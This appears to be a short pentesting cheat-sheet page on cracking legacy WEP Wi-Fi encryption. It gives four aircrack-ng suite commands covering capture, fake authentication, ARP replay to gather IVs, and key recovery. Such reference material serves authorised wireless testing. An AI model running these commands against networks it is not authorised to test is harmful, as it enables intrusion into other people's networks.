WEP Cracking (Legacy)

Exploitation

Deprecated

WEP is obsolete and rarely seen. Included for completeness and legacy system testing. WEP is completely broken and can be cracked in minutes.

Step 1: Start capture.

01-start-capture.sh
bash 
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon

Step 2: Generate traffic with fake authentication.

02-fake-auth.sh
bash 
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF wlan0mon

Step 3: Perform ARP replay attack to generate IVs. Wait for ~20,000+ IVs.

03-arp-replay.sh
bash 
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon

Step 4: Crack the WEP key.

04-crack-wep.sh
bash 
aircrack-ng wep_capture-01.cap

Related Topics

Wireless Pentesting

Wireless Tools

Encryption Cheatsheet